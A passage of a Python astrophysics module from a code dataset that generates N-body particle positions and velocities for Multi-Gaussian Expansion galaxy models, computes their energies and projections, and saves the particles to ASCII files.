##\n self.overwrite = kwargs.get('overwrite', None)\n ## First Realised Particle, and Max number of Particle -- ##\n self.FirstRealisedPart = np.int(kwargs.get('FirstRealisedPart', 0))\n self.nMaxPart = np.int(kwargs.get('nMaxPart', 0))\n ## Softening -- default is 0 (no softening)--------- ##\n self.Softening = kwargs.get('Softening', 0.0)\n ## Verbose: default is 1 ----------##\n verbose = kwargs.get('verbose', 1)\n ## -------------------------------------------------------------------------------------##\n\n ## Softening in pc----------------------------------##\n if self.Softening > 0. :\n print(\"WARNING: Softening will be %g (pc) !!!\"%(self.Softening))\n self.Softarc = self.Softening / self.pc_per_arcsec # Softening in Arcseconds\n self.SoftarcMbh = self.Softarc # best approx for Mbh smoothing\n self.SoftarcMbh2 = self.SoftarcMbh**2\n\n ## -- Method for Truncating the Density distribution of particles ---##\n self.TruncationMethod = kwargs.get('TruncationMethod', 'Ellipsoid')\n if self.TruncationMethod == \"Cylindre\" :\n self.Rcut = kwargs.get('Rcut', 50000)\n self.Zcut = kwargs.get('Zcut', 50000)\n Xcut = self.Rcut\n self.Rcutarc = self.Rcut / self.pc_per_arcsec\n self.Zcutarc = self.Zcut / self.pc_per_arcsec\n elif self.TruncationMethod == \"Ellipsoid\" :\n self.mcut = kwargs.get('mcut', 50000)\n Xcut = self.mcut\n self.mcutarc = self.mcut / self.pc_per_arcsec\n else :\n print(\"ERROR: TruncationMethod should be Cylindre or Ellipsoid. not %s\" %(self.TruncationMethod))\n return\n\n ## We first save the MGE file for archival purposes, as well as the initial parameters\n self.RealisationTime = time.time()\n dest_filename = self.saveMGE + \"/\" + \"%s_\"%(str(self.RealisationTime)) + self.MGEname\n if os.path.isfile(dest_filename) & (str(self.overwrite).lower() != \"o\") :\n print(\"ERROR: filename already exists in Archival Directory %s\"%(dest_filename))\n print(\" Please use overwrite mode (O) or provide a different output directory (saveMGE)\")\n return\n os_command = \"cp %s %s\"%(self.fullMGEname, dest_filename)\n os.system(os_command)\n #--------------------------------------------------------------------------------------#\n\n ## Save the command into a file with the same time\n text = \"init_nbody(Rcut=%g, Zcut=%g, mcut=%g, ComputeV=%d, GasDisk=%s, SigRGas=%g, SigThetaGas=%g, SigZGas=%g, TruncationMethod=%s, Add_BHParticle=%r, FirstRealisedPart=%r, nMaxPart=%r, overwrite=%r)\\n\"%(self.Rcut, self.Zcut, self.mcut, ComputeV, GasDisk, self.SigRGas, self.SigThetaGas, self.SigZGas, self.TruncationMethod, self.Add_BHParticle, self.FirstRealisedPart, self.nMaxPart, self.overwrite)\n fout = open(self.saveMGE + \"/\" + \"%s\"%(str(self.RealisationTime)) + \".MGE_CI\", \"w+\")\n fout.write(text)\n fout.close()\n #-------------------------------------------------#\n\n ## Get all parameters right and the number of particles too\n self._comp_Nparticles()\n\n #==============================================================================================================\n ## End of parameter initialisation\n #==============================================================================================================\n ## Beginning of allocation\n #==============================================================================================================\n\n self.R = np.zeros(self.nRealisedPart, floatMGE)\n self.theta = np.zeros(self.nRealisedPart, floatMGE)\n self.z = np.zeros(self.nRealisedPart, floatMGE) ## in Parsec\n self.x = np.zeros(self.nRealisedPart, floatMGE) ## in Parsec\n self.y = np.zeros(self.nRealisedPart, floatMGE) ## in Parsec\n self.BodGroup = np.zeros(self.nRealisedPart, int)\n self.BodGauss = np.zeros(self.nRealisedPart, int)\n self.BodMass = np.zeros(self.nRealisedPart, floatMGE)\n ## Add the mass of the particle at 0,0,0 0,0,0 (last particle)\n if self.nRealisedPartBH == 1 :\n self.BodMass[-1] = self.Mbh\n\n ## Allocation for particles dynamics ############################\n self.NSpin = np.ones(self.nRealisedPart, floatMGE)\n self.NkRTheta = np.zeros(self.nRealisedPart, floatMGE)\n self.NkRZ = np.zeros(self.nRealisedPart, floatMGE)\n\n # Now: how do we derive sigma_R or sigma_Theta\n if self.epicycle.any() : ## Theta will be derived from sigma_R with the epicycle approximation\n R = np.linspace(0., Xcut, 1000) ## Derive a range of R in parsec\n epiratio = self.EpicycleRatio(R / self.pc_per_arcsec) # R is passed in arcsec\n # Function to have from R in pc, sigma_R / sigma_Theta from the epicycle approximation\n funcEpiratio = interpolate.interp1d(R, epiratio)\n\n ## Now we implement (if betaeps=1) the relation beta = 0.6 * eps\n ## Only if specified\n if 'FacBetaEps' in kwargs :\n self.FacBetaEps = kwargs.get('FacBetaEps', 0.6)\n self._init_BetaEps(verbose=True)\n\n ## Derive required values from the anisotropy kRZ2 (sig_R2/ sig_z2)\n self._dParam = dynParamMGE(self)\n\n ############### Computing POSITIONS for the N body realisation ##################\n # for each Gaussian, derive initial positions for particles\n ## Only do this if it is axisymmetric\n if self.axi == 1 :\n\n ##################################### BEGIN STARS, GAS, HALO ######################################\n self.Spin = np.ones(self.nGauss, np.int)\n for i in range(self.nGauss) :\n sigma = self.Sig3D[i]\n\n if self.TruncationMethod == \"Cylindre\" :\n self.x[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = sample_trunc_gauss(sigma=sigma, cutX=self.Rcut, npoints=self.nRealisedPartGauss[i], even=1)\n self.y[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = sample_trunc_gauss(sigma=sigma, cutX=self.Rcut, npoints=self.nRealisedPartGauss[i], even=1)\n sigma = self.Sig3D[i]*self.QxZ[i]\n self.z[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = sample_trunc_gauss(sigma=sigma, cutX=self.Zcut, npoints=self.nRealisedPartGauss[i], even=1)\n self.theta[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = asarray(np.random.uniform(0., 2.*np.pi, size=(self.nRealisedPartGauss[i],)), dtype=floatMGE)\n elif self.TruncationMethod == \"Ellipsoid\" :\n r = sample_trunc_r2gauss(sigma=sigma, cutr=self.mcut, npoints=self.nRealisedPartGauss[i])\n U = asarray(np.random.uniform(-1., 1., size=(self.nRealisedPartGauss[i],)), dtype=floatMGE)\n V = asarray(np.random.uniform(0.,1., size=(self.nRealisedPartGauss[i],)), dtype=floatMGE)\n sqU = np.sqrt(1. - U*U)\n theta = 2. * np.pi * V\n self.x[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = r*sqU*cos(theta)\n self.y[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = r*sqU*sin(theta)\n self.z[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = r * U * self.QxZ[i]\n self.theta[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = theta\n\n self.BodGauss[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = i+1\n self.BodGroup[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = self.GaussDynCompNumber[i]\n self.BodMass[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = self.pmassGauss[i]\n\n ## We set up things so that at the end we have kRZ and kRTheta\n ## First we test if one of the set up variable is negative, which means that we should inverse the Spin\n if (self.kRTheta[i] < 0) :\n self.kRTheta[i] = np.abs(self.kRTheta[i])\n self.Spin[i] = -1\n self.NSpin[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = - np.ones(self.nRealisedPartGauss[i], dtype=floatMGE)\n\n self.NkRZ[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = np.zeros(self.nRealisedPartGauss[i], dtype=floatMGE) + self.kRZ[i]\n if self.epicycle[i] :\n self.NkRTheta[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = funcEpiratio(self.R[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]])\n else :\n self.NkRTheta[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = np.zeros(self.nRealisedPartGauss[i], dtype=floatMGE) + self.kRTheta[i]\n\n print(\"NStar = %d particles Realised over a total of %d\" %(self.nRealisedPartStar, self.nPartStar))\n print(\"NGas = %d particles Realised over a total of %d\" %(self.nRealisedPartGas, self.nPartGas))\n print(\"NHalo = %d particles Realised over a total of %d\" %(self.nRealisedPartHalo, self.nPartHalo))\n if self.nRealisedPartBH == 1:\n print(\"Adding a BH particle of %e Msun\" %(self.Mbh))\n firstStar = 0 # index for the first Star particle\n firstGas = lastStar = self.nRealisedPartStar # index for the first Gas particle - last Star particle\n firstHalo = lastGas = firstGas + self.nRealisedPartGas # index for the first Halo particle - last Gas particle\n firstBH = lastHalo = firstHalo + self.nRealisedPartHalo # index for the BH particle - last Halo particle\n ##################################### END STARS, GAS, HALO ######################################\n\n ## Computing some important quantities : R, r, theta, xarc etc ------------------------- ##\n self.R = sqrt(self.x**2 + self.y**2)\n ## And r spherical\n self.r = sqrt(self.x**2 + self.y**2+self.z**2)\n\n ## Now computing the true theta\n self.theta[(self.x == 0.) & (self.y >= 0.)] = np.pi / 2.\n self.theta[(self.x == 0.) & (self.y < 0.)] = -np.pi / 2.\n self.theta[(self.x < 0.)] = arctan(self.y[(self.x < 0.)] / self.x[(self.x < 0.)]) + np.pi\n self.theta[(self.x > 0.)] = arctan(self.y[(self.x > 0.)] / self.x[(self.x > 0.)])\n\n ### Transforming in arcsecond\n self.xarc = self.x / self.pc_per_arcsec ### Normalisation using the distance of the galaxy\n self.yarc = self.y / self.pc_per_arcsec ### Normalisation using the distance of the galaxy\n self.zarc = self.z / self.pc_per_arcsec ### Normalisation using the distance of the galaxy\n self.Rarc = self.R / self.pc_per_arcsec ### Normalisation using the distance of the galaxy\n self.rarc = self.r / self.pc_per_arcsec ### Normalisation using the distance of the galaxy\n\n R2 = (self.Rarc)**2 ## R in arcsec\n Z2 = (self.zarc)**2 ## z in arcsec\n\n ############### Computing velocities for the N body realisation ##################\n if ComputeV :\n ### Integration using gaussian quadrature ###\n ### First compute the gaussian quadrature points, and weights\n print(\"Starting the derivation of velocities\")\n self.muTheta2 = np.zeros(self.nRealisedPart, floatMGE)\n self.sigz = np.zeros(self.nRealisedPart, floatMGE)\n self.sigR = np.zeros(self.nRealisedPart, floatMGE)\n self.sigT = np.zeros(self.nRealisedPart, floatMGE)\n self.vt = np.zeros(self.nRealisedPart, floatMGE)\n if verbose :\n print(\"End of memory alloc\")\n\n##### OPTION REMOVE if self.GLOBAL_Sigma == False :\n ## Doing it in Dynamical groups #################################\n if verbose :\n print(\"STARTING Local Sigma for each Dynamical Group\")\n ## First check that Dynamical Groups are ordered\n setGauss_Stars = list(range(self.nStarGauss))\n setGauss_Halo = list(range(self.nStarGauss + self.nGasGauss, self.nGauss))\n setGauss = np.concatenate((setGauss_Stars, setGauss_Halo))\n nRealisedPart = self.nRealisedPartStar + self.nRealisedPartHalo\n ## First derive the equations for each INDIVIDUAL DYNAMICAL GROUP for SIGMA_Z\n if nRealisedPart != 0 :\n for i in range(self.nDynComp) :\n iminG = np.min(self.listGaussDynComp[i])\n imaxG = np.max(self.listGaussDynComp[i])\n if (iminG >= self.nStarGauss) & (imaxG < self.nStarGauss+self.nGasGauss) & GasDisk:\n continue\n for j in range(iminG+1, imaxG) :\n if j not in self.listGaussDynComp[i] :\n print(\"ERROR: Dynamical Group %d should included ordered Gaussians\"%(i+1))\n print(\"ERROR: Dynamical Group %d is \"%(i+1),self.listGaussDynComp[i])\n return\n\n startI, endI = self.nRealisedPartCum[iminG], self.nRealisedPartCum[imaxG+1]\n if endI <= startI :\n continue\n R2comp = R2[startI: endI]\n Z2comp = Z2[startI: endI]\n self.rho, self.rhoT = self._MassDensity(R2comp, Z2comp, ilist=list(range(iminG,imaxG+1)))\n self.rhoT = np.where(self.rhoT > 0., self.rhoT, 1.0)\n temp1, temp2 = self._sigmaz2_muTheta2_fromR2Z2(R2comp, Z2comp, ilist=list(range(iminG,imaxG+1)))\n self.sigz[startI: endI] = sqrt(temp1)\n self.muTheta2[startI: endI] = temp2\n if verbose :\n print(\"End of sigz2 and mu2 derivation for Dynamical Group %02d\"%(i+1))\n\n##### REMOVING THIS OPTION - NOT REQUIRED CONSIDERING THE INPUT ASCII FILE WITH DYN GROUPS ###### else :\n#### OPTION REMOVED ###### if verbose :\n#### OPTION REMOVED ###### print \"STARTING GLOBAL Sigma for All Stars and then Halo\"\n#### OPTION REMOVED ###### ## STARS ####################\n#### OPTION REMOVED ###### R2Star = R2[firstStar:lastStar]\n#### OPTION REMOVED ###### Z2Star = Z2[firstStar:lastStar]\n#### OPTION REMOVED\n#### OPTION REMOVED ###### imin = 0\n#### OPTION REMOVED ###### imax = self.nStarGauss-1 # Include all Gaussians, including Halo ones\n#### OPTION REMOVED ###### self.rho, self.rhoT = self._MassDensity(R2Star, Z2Star, imin=imin, imax=imax)\n#### OPTION REMOVED\n#### OPTION REMOVED ###### ## Compute both sigmaz2 and mu2 for the Stars\n#### OPTION REMOVED ###### temp1, temp2 = self.sigmaz2_mut2(R2Star, Z2Star, imin=imin, imax=imax)\n#### OPTION REMOVED ###### self.sigz2[firstStar:lastStar] = temp1\n#### OPTION REMOVED ###### self.mut2[firstStar:lastStar] = temp2\n#### OPTION REMOVED ###### if verbose :\n#### OPTION REMOVED ###### print \"End of sigz2 and mu2 derivation for Stars\"\n#### OPTION REMOVED\n#### OPTION REMOVED ###### ## HALO ####################\n#### OPTION REMOVED ###### R2Halo = R2[firstHalo:lastHalo]\n#### OPTION REMOVED ###### Z2Halo = Z2[firstHalo:lastHalo]\n#### OPTION REMOVED\n#### OPTION REMOVED ###### imin = self.nStarGauss + self.nGasGauss\n#### OPTION REMOVED ###### imax = self.nGauss-1 # Include all Gaussians, including Halo ones\n#### OPTION REMOVED ###### self.rho, self.rhoT = self._MassDensity(R2Halo, Z2Halo, imin=imin, imax=imax)\n#### OPTION REMOVED ###### self.rhoT = np.where(self.rhoT > 0., self.rhoT, 1.0)\n#### OPTION REMOVED\n#### OPTION REMOVED ###### ## Compute both sigmaz2 and mu2 for the Halos\n#### OPTION REMOVED ###### temp1, temp2 = self.sigmaz2_mut2(R2Halo, Z2Halo, imin=imin, imax=imax)\n#### OPTION REMOVED ###### self.sigz2[firstHalo:lastHalo] = temp1\n#### OPTION REMOVED ###### self.mut2[firstHalo:lastHalo] = temp2\n#### OPTION REMOVED ###### if verbose :\n#### OPTION REMOVED ###### print \"End of sigz2 and mu2 derivation for Halo\"\n\n ## Using only kRZ and kRTheta\n sigR = self.sigz * self.NkRZ\n sigTheta = np.minimum(sqrt(self.muTheta2), sigR / self.NkRTheta) # sigma Theta from sigma R\n vt = sqrt(np.clip(self.muTheta2 - sigTheta**2, 0., np.inf))\n self.sigR[firstStar:lastStar] = sigR[firstStar:lastStar] # sigma R from sigma Z\n self.sigR[firstHalo:lastHalo] = sigR[firstHalo:lastHalo] # sigma R from sigma Z\n self.sigT[firstStar:lastStar] = sigTheta[firstStar:lastStar] # sigma Theta from sigma R\n self.sigT[firstHalo:lastHalo] = sigTheta[firstHalo:lastHalo] # sigma Theta from sigma R\n # Mean V theta\n self.vt[firstStar:lastStar] = vt[firstStar:lastStar]\n self.vt[firstHalo:lastHalo] = vt[firstHalo:lastHalo]\n if not GasDisk :\n self.sigR[firstGas:lastGas] = sigR[firstGas:lastGas] # sigma R from sigma Z\n self.sigT[firstGas:lastGas] = sigTheta[firstGas:lastGas] # sigma Theta from sigma R\n self.vt[firstGas:lastGas] = vt[firstGas:lastGas]\n if verbose :\n if GasDisk :\n print(\"End of sigz2 and mu2 derivation for All Stars and Halo particles\")\n else :\n print(\"End of sigz2 and mu2 derivation for All Stars, Gas and Halo particles\")\n\n ## GAS ######################\n if opGAS & GasDisk:\n self.vt[firstGas:lastGas] = self.Vcirc(self.Rarc[firstGas:lastGas])\n self.muTheta2[firstGas:lastGas] = self.vt[firstGas:lastGas]**2 + self.SigThetaGas**2\n temp = np.zeros_like(self.sigR[firstGas:lastGas])\n self.sigR[firstGas:lastGas] = temp + self.SigRGas # sigma R for the Gas\n self.sigT[firstGas:lastGas] = temp + self.SigThetaGas # sigma Theta for the Gas\n self.sigz[firstGas:lastGas] = temp + self.SigZGas # sigma Z for the Gas\n if verbose :\n print(\"End of sigz2 and mu2 derivation for Gas\")\n\n ## Changing the spin of the component\n self.vt *= self.NSpin\n\n ## Starting the randomization of velocities using the derived V and Sigma values\n print(\"Randomizing the Velocities\")\n Vescape = self.Vescape(self.Rarc,self.zarc) # Vescape : cut it if the total velocity is higher\n Nrejected = 0\n Nstart = 0\n Nremain = self.nRealisedPart\n ind = list(range(self.nRealisedPart))\n self.Vz = np.zeros(self.nRealisedPart, floatMGE)\n self.VR = np.zeros(self.nRealisedPart, floatMGE)\n self.Vtheta = np.zeros(self.nRealisedPart, floatMGE)\n self.Vtot = np.zeros(self.nRealisedPart, floatMGE)\n iter = 0\n while Nremain != 0 :\n ### Randomize the positions taking into account the 3D width of the Gaussian\n self.Vz[ind] = asarray(np.random.normal(0., 1., Nremain), dtype=floatMGE) * self.sigz[ind]\n self.VR[ind] = asarray(np.random.normal(0., 1., Nremain), dtype=floatMGE) * self.sigR[ind]\n self.Vtheta[ind] = asarray(np.random.normal(0., 1., Nremain), dtype=floatMGE) * self.sigT[ind] + self.vt[ind]\n\n self.Vtot[ind] = sqrt(self.Vz[ind]**2 + self.VR[ind]**2 + self.Vtheta[ind]**2)\n\n ind = np.ravel(np.where(self.Vtot[ind] > Vescape[ind])) # indices which are NOT ok with Vesc\n nrealised = Nremain - ind.size\n Nstart = Nstart+nrealised\n Nremain = ind.size\n iter += 1\n print(\"NtotalV = %d, Nrealised = %d, Nremaining = %d, Iter = %d\" %(Nstart, nrealised, Nremain, iter))\n Nrejected += Nremain\n\n print(\"Rejected (recalculated) points above Vescape: %d\" %(Nrejected))\n\n self.Vx = self.VR * cos(self.theta) - self.Vtheta * sin(self.theta)\n self.Vy = self.VR * sin(self.theta) + self.Vtheta * cos(self.theta)\n\n return\n\n############################################################################################################\n####################################### END OF NBODY REALIZATION ###########################################\n############################################################################################################\n\n def comp_Pot(self) :\n self.EcPot = self.Pot(self.Rarc, self.zarc)\n self.EcPotT = np.sum(self.EcPot)\n return\n\n def comp_Ep(self) :\n print(\"==== Potential Energy ====\")\n print(\"WARNING: this is a direct computation of the potential energy: can be time consuming!\")\n self.Ep = np.zeros(self.nRealisedPart, floatMGE)\n for i in range(self.nRealisedPart) :\n Ep = np.sum(concatenate((1./sqrt((self.x[:i] - self.x[i])**2 + (self.y[:i] - self.y[i])**2 + (self.z[:i] - self.z[i])**2), 1./sqrt((self.x[i+1:] - self.x[i])**2 + (self.y[i+1:] - self.y[i])**2 + (self.z[i+1:] - self.z[i])**2))),axis=0)\n self.Ep[i] = - Ep * self.Gorig * self.BodMass**2\n\n self.EpT = np.sum(self.Ep,axis=0) / 2.\n return\n\n def comp_Ec(self) :\n print(\"==== Kinetic Energy ====\")\n self.Ec = 0.5 * self.BodMass * (self.Vx**2 + self.Vy**2 + self.Vz**2)\n self.EcT = np.sum(self.Ec,axis=0)\n return\n\n ################## Projection of the MGE model ################\n def projpart(self, inclin=90.) :\n \"\"\" Projection of an MGE realization (N particles) using a defined inclination\n inclin: inclination in degrees, 90 being edge-on, 0 being face-on\n \"\"\"\n\n inclin_rad = inclin * np.pi / 180.\n self.Xp = self.x\n self.Yp = self.y * cos(inclin_rad) + self.z * sin(inclin_rad)\n self.Zp = - self.y * sin(inclin_rad) + self.z * cos(inclin_rad)\n self.Xparc = self.Xp / self.pc_per_arcsec\n self.Yparc = self.Yp / self.pc_per_arcsec\n self.Zparc = self.Zp / self.pc_per_arcsec\n\n self.Vrad = self.Vy * sin(inclin_rad) - self.Vz * cos(inclin_rad)\n\n return\n #===================================================================\n\n ##################################################################\n ### Save the Nbody coordinates x,y,z,Vx,Vy,Vz in an ascii file #\n ##################################################################\n def save_nbody(self, outdir=None, outfilename=None, overwrite=False, arcsec=False) :\n \"\"\" Save the N body realizationof an MGE model into an ascii file\n name : string defining the name of the output file\n overwrite: if file exists, overwrite or not - default = False\n arcsec: save the positions in arcseconds or pc - default= False (pc)\n \"\"\"\n if outfilename is None :\n print(\"You must specify an output ascii file\")\n return\n\n if outdir is not None :\n outfilename = outdir + outfilename\n\n if os.path.isfile(outfilename) and overwrite==False : # testing the existence of the file\n print('WRITING ERROR: File %s already exists, use overwrite=True if you wish' %outfilename)\n return\n\n ascii_file = open(outfilename, mode=\"w\")\n\n if arcsec == True :\n outx = self.xarc\n outy = self.yarc\n outz = self.zarc\n else :\n outx = self.x\n outy = self.y\n outz = self.z\n\n for i in range(self.nRealisedPart) :\n line = \"%12.5e %12.5e %12.5e %12.5e %12.5e %12.5e %12.5e \\n\" %(outx[i], outy[i], outz[i], self.Vx[i], self.Vy[i], self.Vz[i], self.BodMass[i])\n ascii_file.write(line)\n\n ascii_file.close\n return\n #===================================================================\n", "sub_path": "pygme/init_partMGE.py", "file_name": "init_partMGE.py", "file_ext": "py", "file_size_in_byte": 30045, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pygme.dynMGE.dynMGE", "line_number": 27, "usage_type": "name"}, {"api_name": "pygme.dynMGE.dynMGE.__init__", "line_number": 29, "usage_type": "call"}, {"api_name": "pygme.dynMGE.dynMGE", "line_number": 29, "usage_type": "name"}, {"api_name": "numpy.int", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 101, "usage_type": "call"}, {"api_name": "time.time", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 134, "usage_type": "call"}, {"api_name": "os.path", "line_number": 134, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 158, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 158, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 159, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 159, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 160, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 160, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 161, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 161, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 162, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 162, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 165, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 165, "usage_type": "argument"}, {"api_name": "numpy.ones", "line_number": 171, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 171, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 172, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 172, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 173, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 173, "usage_type": "argument"}, {"api_name": "numpy.linspace", "line_number": 177, "usage_type": "call"}, {"api_name": "scipy.interpolate.interp1d", "line_number": 180, "usage_type": "call"}, {"api_name": "scipy.interpolate", "line_number": 180, "usage_type": "name"}, {"api_name": "pygme.paramMGE.dynParamMGE", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 197, "usage_type": "attribute"}, {"api_name": "pygme.mge_miscfunctions.sample_trunc_gauss", "line_number": 202, "usage_type": "call"}, {"api_name": "pygme.mge_miscfunctions.sample_trunc_gauss", "line_number": 203, "usage_type": "call"}, {"api_name": "pygme.mge_miscfunctions.sample_trunc_gauss", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 206, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 206, "usage_type": "attribute"}, {"api_name": "rwcfor.floatMGE", "line_number": 206, "usage_type": "name"}, {"api_name": "pygme.mge_miscfunctions.sample_trunc_r2gauss", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 209, "usage_type": "attribute"}, {"api_name": "rwcfor.floatMGE", "line_number": 209, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 210, "usage_type": "attribute"}, {"api_name": "rwcfor.floatMGE", "line_number": 210, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 212, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 225, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 227, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 227, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 229, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 229, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 233, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 233, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 247, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 249, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 252, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 253, "usage_type": "attribute"}, {"api_name": "numpy.arctan", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 254, "usage_type": "attribute"}, {"api_name": "numpy.arctan", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 272, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 272, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 273, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 273, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 274, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 274, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 275, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 275, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 276, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 276, "usage_type": "argument"}, {"api_name": "numpy.concatenate", "line_number": 287, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.minimum", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 352, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 374, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 391, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 391, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 392, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 392, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 393, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 393, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 394, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 394, "usage_type": "argument"}, {"api_name": "numpy.asarray", "line_number": 398, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 398, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 398, "usage_type": "attribute"}, {"api_name": "rwcfor.floatMGE", "line_number": 398, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 399, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 399, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 399, "usage_type": "attribute"}, {"api_name": "rwcfor.floatMGE", "line_number": 399, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 400, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 400, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 400, "usage_type": "attribute"}, {"api_name": "rwcfor.floatMGE", "line_number": 400, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 402, "usage_type": "call"}, {"api_name": "numpy.ravel", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 414, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 414, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 415, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 415, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 425, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 431, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 431, "usage_type": "argument"}, {"api_name": "numpy.sum", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 436, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 442, "usage_type": "call"}, {"api_name": "numpy.pi", 